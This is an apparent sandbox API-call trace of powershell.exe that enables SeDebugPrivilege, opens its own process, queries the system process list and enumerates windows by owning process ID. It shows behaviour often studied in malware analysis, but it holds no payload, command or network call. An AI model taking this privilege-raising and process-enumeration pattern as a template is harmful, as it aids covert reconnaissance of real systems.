	[0599.079] CoTaskMemFree (pv=0x2e20d0) 
	[0599.079] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\", lplpBuffer=0x16dfa8, puLen=0x16dfa0 | out: lplpBuffer=0x16dfa8*=0x2b272c8, puLen=0x16dfa0) returned 1
	[0599.087] GetCurrentProcessId () returned 0x14f0
	[0599.104] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16ced0 | out: lpLuid=0x16ced0*(LowPart=0x14, HighPart=0)) returned 1
	[0599.108] GetCurrentProcess () returned 0xffffffffffffffff
	[0599.109] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cef0 | out: TokenHandle=0x16cef0*=0x2fc) returned 1
	[0599.110] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2b2ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0599.111] CloseHandle (hObject=0x2fc) returned 1
	[0599.115] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x14f0) returned 0x2fc
	[0600.420] EnumProcessModules (in: hProcess=0x2fc, lphModule=0x2b2ab80, cb=0x200, lpcbNeeded=0x16df08 | out: lphModule=0x2b2ab80, lpcbNeeded=0x16df08) returned 1
	[0600.423] GetModuleInformation (in: hProcess=0x2fc, hModule=0x13f370000, lpmodinfo=0x2b2adf0, cb=0x18 | out: lpmodinfo=0x2b2adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0600.424] CoTaskMemAlloc (cb=0x804) returned 0x347930
	[0600.424] GetModuleBaseNameW (in: hProcess=0x2fc, hModule=0x13f370000, lpBaseName=0x347930, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0600.424] CoTaskMemFree (pv=0x347930) 
	[0600.425] CoTaskMemAlloc (cb=0x804) returned 0x347930
	[0600.425] GetModuleFileNameExW (in: hProcess=0x2fc, hModule=0x13f370000, lpFilename=0x347930, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0600.425] CoTaskMemFree (pv=0x347930) 
	[0600.426] CloseHandle (hObject=0x2fc) returned 1
	[0600.434] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x14f0) returned 0x2fc
	[0600.435] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x16e038 | out: lpExitCode=0x16e038*=0x103) returned 1
	[0600.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b2b088, Length=0x20000, ResultLength=0x16e000 | out: SystemInformation=0x12b2b088, ResultLength=0x16e000*=0x35c28) returned 0xc0000004
	[0600.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b4b0b8, Length=0x38428, ResultLength=0x16e000 | out: SystemInformation=0x12b4b0b8, ResultLength=0x16e000*=0x35c28) returned 0x0
	[0602.076] EnumWindows (lpEnumFunc=0x29a66ac, lParam=0x0) returned 1
	[0602.078] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0605.206] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x558
	[0607.733] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0607.735] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0608.688] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0609.267] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x538
	[0609.270] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0609.276] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x778
	[0610.311] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x778
	[0610.715] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0610.717] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0610.719] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0610.720] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0610.721] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0612.148] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0613.279] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0614.598] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0618.611] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0618.614] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0618.616] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0618.618] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x3a8
	[0618.619] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1bd0
	[0618.620] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1bfc
	[0619.903] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1a78
	[0620.959] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b90
	[0621.435] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b04
	[0621.435] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b34
	[0622.789] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b64
	[0622.794] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1bb0
	[0623.820] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1acc
	[0624.675] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1a2c
	[0624.684] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x19a8
	[0624.687] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1944
	[0624.690] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x18c8
	[0624.692] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x18ac
	[0624.695] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x18ec
	[0625.440] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1898
	[0625.639] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc98
	[0626.460] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x153c
	[0626.930] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1808
	[0626.935] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12a4
	[0626.940] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1740
	[0626.944] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16c4
	[0626.947] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1820
	[0626.949] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16ac
	[0626.950] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1858
	[0627.863] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1664
	[0629.496] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10b4
	[0629.712] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10ac
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10ec
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1068
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x17e0
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x102c
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x17a4
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1050
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1694
	[0630.778] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1770
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1720
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x165c
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1578
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16c0
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x161c
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1638
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x15c8
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1554
	[0630.779] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1674
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1520
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x14bc
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf8c
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe9c
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1434
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x14ec
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfcc
	[0630.780] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12ac
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1484
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x934
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc0c
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb08
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x948
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1178
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13e0
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xcd0
	[0630.781] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13fc
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdc8
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc18
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc2c
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa1c
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1244
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdb0
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1398
	[0630.782] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1358
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1370
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1340
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x130c
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12c0
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12e4
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1270
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1298
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x120c
	[0630.783] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x122c
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11c4
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11b0
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1188
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1148
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1160
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10fc
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe34
	[0630.784] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xea4
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x514
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe48
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbc8
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdf8
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x318
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xcac
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x8bc
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf9c
	[0630.785] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf48
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe40
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xecc
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xeb8
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe80
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe98
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe60
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xee4
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf00
	[0630.786] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdf0
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe1c
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdd0
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd94
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd74
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd00
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xcd8
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc84
	[0630.787] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xca4
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc64
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc24
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb84
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbac
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x384
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xab8
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x33c
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa44
	[0630.788] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa64
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x8a8
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xaf0
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x88c
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb04
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x910
	[0630.789] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x230
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xac0
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xab4
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xaac
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x3d0
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x978
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa7c
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x59c
	[0630.790] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa88
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa6c
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa68
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x9f8
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa04
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x924
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x8dc
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7dc
	[0630.791] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x768
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x764
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x820
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x810
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x794
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x83c
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7ac
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb44
	[0630.792] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb5c
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x838
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
